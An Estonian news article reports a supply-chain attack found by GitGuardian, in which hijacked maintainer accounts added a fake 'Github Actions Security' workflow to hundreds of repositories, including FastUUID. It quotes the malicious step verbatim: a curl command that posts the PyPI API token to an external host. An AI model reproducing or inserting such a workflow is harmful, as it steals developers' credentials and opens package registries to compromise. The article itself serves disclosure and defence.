GitGuardian'i teadlased avastasid massilise rünnaku GitHubi kasutajate vastu, mille käigus saadi kontroll 327 kontole ning nakatati 817 hoidlat pahatahtliku Github Action töötlejaga. Rünnak tõi kaasa 3325 saladuse lekke, mis on kasutusel pidevas integreerimises ja edastatakse keskkonna muutujate kaudu, sealhulgas juurdepääsutokenid PyPI, GitHubi, NPM-i, DockerHubi ja erinevatesse pilvehoidlatest.

GitHub Actions võimaldab koodiarendajatel kinnitada töötlejat erinevate operatsioonide automatiseerimiseks GitHubis. Näiteks saab GitHub Actions abil teostada teatud kontrolle ja teste kommitide tegemisel või automatiseerida uute probleemide töötlemist. Pahatahtlik töötleja levis nimega „Github Actions Security“ ja sisaldas „run“ sektsioonis käsku „curl“, mis edastas keskkonna muutujate sisu välisele hostile pideva integreerimise keskkonnas ülesannete käivitamisel. Pahatahtlik commit lisati projektide hooldajate kontode kaudu, mis tõenäoliselt olid enne seda häkitud või sattunud kalastamise ohvriks.
Rünnak tuvastati pärast anomaalse tegevuse analüüsi, mis oli seotud paketiga FastUUID, mis pakub Python'i peal Rust'i raamatukogu UUID. Pakett FastUUID, millele on viimase nädala jooksul registreeritud peaaegu 1,2 miljonit allalaadimist, kasutatakse sõltuvusena populaarsetes projektides nagu LiteLLM, millel on PyPI-s üle 5 miljoni allalaadimise nädalas. FastUUID hoidla muudatuste analüüs näitas, et 2. septembril lisas projekti hooldaja commit'i uue Github Action'i töötlejaga, mis sisaldas koodi, mis edastas tokeni PyPIsse välisele hostile. — name: Github Actions Security run: | curl -s -X POST -d ‘PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}’ https://bold-dhawan.45-139-104-115.plesk.page
Probleem suudeti avastada enne, kui kurjategijad kasutasid häkitud tokenit — pahatahtlike muudatuste või muudetud versioonide avaldamist pakendis FastUUID PyPI-s ei registreeritud. Sarnaseid Github Action'i nakatusi on leitud veel 816 hoidlast, mille omanikele ja PyPI, GitHubi, NPM-i ning DockerHubi administratsioonile on saadetud teated. Eile õhtul olid pahatahtlikud commitid tühistatud umbes 100 hoidlas. Praegu on GitHubis tuvastatud 671 commit'i, mis sisaldavad pahatahtlikku Github Action'i.
Allikas: opennet.ru
